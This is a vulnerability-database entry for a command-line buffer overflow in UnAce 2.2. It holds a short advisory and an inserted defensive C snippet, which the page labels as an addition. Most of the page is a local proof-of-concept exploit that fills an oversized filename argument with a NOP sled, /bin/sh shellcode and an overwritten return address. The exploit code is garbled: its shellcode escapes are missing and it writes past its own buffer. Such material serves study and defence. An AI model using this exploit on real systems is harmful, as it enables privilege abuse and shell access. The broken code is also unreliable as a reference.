Winace UnAce 2.2 – Command Line Argument Buffer Overflow (1)
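Vulnerability ID | 1054243 | Vulnerability type | |
Published | 2003-11-10 | Updated | 2003-11-10 |
CVE ID | N/A |
CNNVD-ID | N/A |
Platform | Linux | CVSS score | N/A |
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit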
source: http://www.securityfocus.com/bid/9002/info
UnAce has been reported to be prone to a buffer overflow vulnerability. The issue presents itself when UnAce handles ace filenames that are of excessive length. When this filename is passed to the UnAce utility as an argument, the string is copied into a reserved buffer in memory. Data that exceeds the size of the reserved buffer will overflow its bounds and will trample any saved data that is adjacent to the affected buffer. Ultimately this may lead to the execution of arbitrary instructions in the context of the user who is running UnAce.
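The root cause described above, as an added example that is not UnAce's code and not part of the original advisory: an unbounded copy of a command-line filename into a fixed buffer, next to a length-checked version that rejects over-long names. `NAME_BUF`, its 512-byte size and the function names are assumptions; the page does not give UnAce's real buffer size.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

#define NAME_BUF 512 /* assumed size; UnAce's real buffer size is not on the page */

/* The pattern the advisory describes: argv is copied with no length check.
 * Shown for contrast only; it overflows dst when strlen(arg) >= NAME_BUF. */
void store_name_unchecked(char dst[NAME_BUF], const char *arg)
{
    strcpy(dst, arg);
}

/* Hardened form: reject instead of truncating, so an over-long name can
 * never silently refer to a different file. Returns 0 on success, -1 on error. */
int store_name_checked(char *dst, size_t dstsz, const char *arg)
{
    const char *end;

    if (dst == NULL || dstsz == 0 || arg == NULL) {
        errno = EINVAL;
        return -1;
    }
    end = memchr(arg, '\0', dstsz);   /* looks at no more than dstsz bytes */
    if (end == NULL) {                /* name plus NUL does not fit */
        dst[0] = '\0';
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(dst, arg, (size_t)(end - arg) + 1); /* includes the NUL */
    return 0;
}

/* Self-check on constructed input: a normal name, and a 711-byte name,
 * the argument length built by the PoC on this page. Returns 0 if all pass. */
int demo(void)
{
    char name[NAME_BUF];
    char longarg[712];

    memset(longarg, 'A', 711);
    longarg[711] = '\0';
    if (store_name_checked(name, sizeof name, "archive.ace") != 0) return 1;
    if (strcmp(name, "archive.ace") != 0) return 2;
    if (store_name_checked(name, sizeof name, longarg) != -1) return 3;
    if (errno != ENAMETOOLONG || name[0] != '\0') return 4;
    return 0;
}
```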
/* gEEk-unace.c
*
* PoC exploit made for advisory based upon a local stack based overflow.
* Vulnerable versions, maybe also prior versions:
*
* Unace v2.2
*
* Tested on: Debian 3.0
*
* Advisory source: MegaHz
* http://www.securityfocus.com/archive/1/344065/2003-11-07/2003-11-13/0
*
* -----------------------------------------
* coded by: demz (geekz.nl) ([email protected])
* -----------------------------------------
*
*/
#include <stdio.h>
#include <stdlib.h>
char shellcode[]=
"x31xc0" // xor eax, eax
"x31xdb" // xor ebx, ebx
"x31xc9" // xor ecx, ecx
"xb0x46" // mov al, 70
"xcdx80" // int 0x80
"x31xc0" // xor eax, eax
"x50" // push eax
"x68x6ex2fx73x68" // push long 0x68732f6e
"x68x2fx2fx62x69" // push long 0x69622f2f
"x89xe3" // mov ebx, esp
"x50" // push eax
"x53" // push ebx
"x89xe1" // mov ecx, esp
"x99" // cdq
"xb0x0b" // mov al, 11
"xcdx80" // int 0x80
"x31xc0" // xor eax, eax
"xb0x01" // mov al, 1
"xcdx80"; // int 0x80
int main()
{
unsigned long ret = 0xbfffc260;
char buffer[707];
int i=0;
memset(buffer, 0x90, sizeof(buffer));
for (0; i < strlen(shellcode) - 1;i++)
buffer[300 + i] = shellcode[i];
buffer[707] = (ret & 0x000000ff);
buffer[708] = (ret & 0x0000ff00) >> 8;
buffer[709] = (ret & 0x00ff0000) >> 16;
buffer[710] = (ret & 0xff000000) >> 24;
buffer[711] = 0x0;
printf("nUnace v2.2 local exploitn");
printf("---------------------------------------- demz @ geekz.nl --n");
execl("./unace", "unace", "e", buffer, NULL);
}